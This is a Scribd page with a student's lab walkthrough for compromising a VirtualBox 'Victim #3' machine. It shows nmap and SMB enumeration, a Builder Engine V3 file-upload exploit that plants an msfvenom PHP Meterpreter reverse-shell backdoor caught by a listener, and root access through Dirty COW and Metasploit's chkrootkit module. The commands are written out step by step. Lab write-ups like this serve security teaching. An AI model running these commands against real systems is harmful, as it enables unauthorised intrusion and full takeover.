Scribd
Upload
107 views4 pages

Exploiting Victim #3: Steps and Tools

The document details steps to scan, enumerate, exploit, and gain root access on a vulnerable system. It describes using nmap to scan for open ports and services, then exploiting a Builder Engine V3 arbitrary file upload vulnerability to upload a reverse PHP shell. Privilege escalation is achieved using Dirty COW and modifying /etc/passwd.

Uploaded by

Shaima Al Marzooqi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
107 views4 pages

Exploiting Victim #3: Steps and Tools

The document details steps to scan, enumerate, exploit, and gain root access on a vulnerable system. It describes using nmap to scan for open ports and services, then exploiting a Builder Engine V3 arbitrary file upload vulnerability to upload a reverse PHP shell. Privilege escalation is achieved using Dirty COW and modifying /etc/passwd.

Uploaded by

Shaima Al Marzooqi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

1- Information Gathering (Scanning)

a. Host Discovery ==> nmap [Link]/24 -sn -n -T5


b.1 Port Scanning ==> nmap -F -T5 -n [Link]
b.2 Details scan ==> nmap [Link] -p- -T5 -n -sV

Victim #3 ==> [Link]

nmap [Link] -p- -T5 -n -sV


nmap [Link] -p- -T5 -n -sV -A ==> more Details
nmap [Link] -p- -T5 -n
nmap -sV -T5 -A -O -p1-65535 [Link]

2- Enumeration >> builderEngine is most interesting exploitation we found

22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol
2.0)
53/tcp open domain ISC BIND 9.9.5-3 (Ubuntu Linux)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
110/tcp open pop3
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
445/tcp open netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup:
WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: [Link] (Oracle VirtualBox virtual NIC)

# smbmap -H [Link]
# smbclient //[Link]/print$ ==> password: IPC$

USERS: (viper, crackmeforpoints, root, firefart, monther, nobody)

Builder Engine V3
Arbitrary File Upload vulnerability
- This will allow us to take any file from our Kali and through it on the server and when
through it on the server (will have a malware [Link]/files/[Link])
- Then, when access or activate this backdoor, it will open the link back to my Kali
- Steps:
1- msfvenom > [Link] (Application help to right Malware but we don’t actually
right a malware there is a link contain this malware) php code put on php web server
which will connect to server to open a session

2- Form to upload malware backdoor to v3 Web App Engine V3 (This form to exploit the
Arbitrary File Upload vulnerability) after uploaded to server we need a listener

3- Setup listener (receiver) msfconsole meterpreter (prepare a payload)

4- Activate the backdoor (without listener the backdoor try to connect with something
not exist)

5- Find OS + uppload privilege escalation malware and get root

For each ports we need to enumerate:


dirb [Link]
niko -h [Link]
nikto -h [Link] ==>> enumerate this port
smbclient

enum4linux [Link]
- Users found from enumeration:
S-1-22-1-1000 Unix User\crackmeforpoints (Local User)
S-1-22-1-1001 Unix User\monther (Local User)
viber
firefart
root

On web browser ==> exploit db builderengine v3 ==> Arbitrary file (php)


Download the exploit then it will open the code ==> change the local host to [Link]
(IP of victim) >> save it as [Link]
On the firefox =>search for: msfvenom reverse tcp php

man msfvenom

- Creating the Malware:


#msfvenom -p php/meterpreter/reverse_tcp LHOST=[Link] LPORT=5555 -f raw >
[Link]
#cd /home/fatema/Desktop/V3
#ls
Then, open the uploadexploit on V3 folder ==> choose the backdoor file and send it
copy this ==> http:\/\/[Link]\/files\/[Link] >>
http:\/\/[Link]\/files\/[Link]
This will create the backdoor malware
open the command window and type
#msfconsole
#use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options
set LHOST [Link] ==> setting my kali IP
set LPORT 5555 ==>> setting the port I want to open on my Kali
show options
exploit
Open the web browser and paste this: ==> this we copied from the page we send the
php code. (http:\/\/[Link]\/files\/[Link])
In command window it showed start the TCP handler
it should open the meterpreter then type ==> ?
in the meterpreter type sysinfo ==>> to get the information
shell
ls
pwd
id

pwd
cd ..
ls
cd ..
ls ==> we have the [Link]
cat [Link]
pwd
cd /home
ls
exit

3- Privilege Escalation
open the web browser and search for: Linux 3.13 dirtycowexploit DB >> its dirty cow
vulnerability it use pokemon exploit
[Link]

open another exploit dirty cow and copy this: [Link]


echo 0 > /proc/sys/vm/dirty_writeback_centisecs

open new command window ==> ssh firefart@[Link] but don’t hit enter
go back to the main command window
pwd
cd /tmp
upload /home/fatema/Desktop/V3/dc.c

ls
shell
ls
gcc dc.c -lcrypt -pthread -o exploit

./exploit 12 ==> hit enter


go back to ssh window hit enter and password is 12
then paste the ==> echo 0 > /proc/sys/vm/dirty_writeback_centisecs
whomi
id
cd /root
ls
cat [Link]
cd/ tmp
ls
cp [Link] /etc/passwd
cd /root
ls
cd chkrootkit/
ls
exit
exit

cd /root
cd /etc/chkrootkit
ls
cat READMEFILE
background
search chkrootkit
info exploit/unix/local/chkrootkit
use exploit/unix/local/chkrootkit
show sessions
set session 1
options
exploit

You might also like